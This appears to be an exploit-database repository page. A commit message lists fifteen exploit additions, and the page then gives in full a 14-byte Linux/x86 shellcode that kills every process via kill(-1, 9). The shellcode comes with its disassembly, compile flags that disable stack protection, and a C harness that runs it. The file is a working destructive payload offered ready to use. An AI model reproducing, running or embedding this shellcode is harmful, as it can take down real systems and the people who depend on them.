1b31850a46
15 changes to exploits/shellcodes Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC) Google Chrome 70 - SQLite Magellan Crash (PoC) Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Copy/Read Keybase keybase-redirector - '$PATH' Local Privilege Escalation Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC) Netatalk - Bypass Authentication Kubernetes - (Unauthenticated) Arbitrary Requests Kubernetes - (Authenticated) Arbitrary Requests WSTMart 2.0.8 - Cross-Site Scripting WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin) FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read PhpSpreadsheet < 1.5.0 - XML External Entity (XXE) Linux/x86 - Kill All Processes Shellcode (14 bytes)
42 lines
No EOL
1.3 KiB
C
42 lines
No EOL
1.3 KiB
C
# Exploit Title: Linux/x86 - Kill All Processes Shellcode (14 bytes)
|
|
# Google Dork: None
|
|
# Date: 2018-12-08
|
|
# Exploit Author: strider
|
|
# Vendor Homepage: None
|
|
# Software Link: None
|
|
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
|
|
# CVE : None
|
|
# Shellcode Length: 14
|
|
# Description: Linux/x86 kill 9 -1 (14 bytes)
|
|
------------------------------[Description]---------------------------------
|
|
|
|
This shellcode will kill all processes
|
|
|
|
-----------------------------[Shellcode Dump]---------------------------------
|
|
|
|
08048060 <_start>:
|
|
8048060: 31 c0 xor %eax,%eax
|
|
8048062: 50 push %eax
|
|
8048063: b0 25 mov $0x25,%al
|
|
8048065: bb ff ff ff ff mov $0xffffffff,%ebx
|
|
804806a: b1 09 mov $0x9,%cl
|
|
804806c: cd 80 int $0x80
|
|
|
|
-----------------------------[Compile]---------------------------------------------
|
|
gcc -m32 -fno-stack-protector -z execstack -o tester tester.c
|
|
|
|
-----------------------------[C-Code]-----------------------------
|
|
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char code[] = "\x31\xc0\x50\xb0\x25\xbb\xff\xff\xff\xff\xb1\x09\xcd\x80";
|
|
main()
|
|
{
|
|
|
|
printf("Shellcode Length: %d\n", strlen(code));
|
|
|
|
int (*ret)() = (int(*)())code;
|
|
|
|
ret();
|
|
} |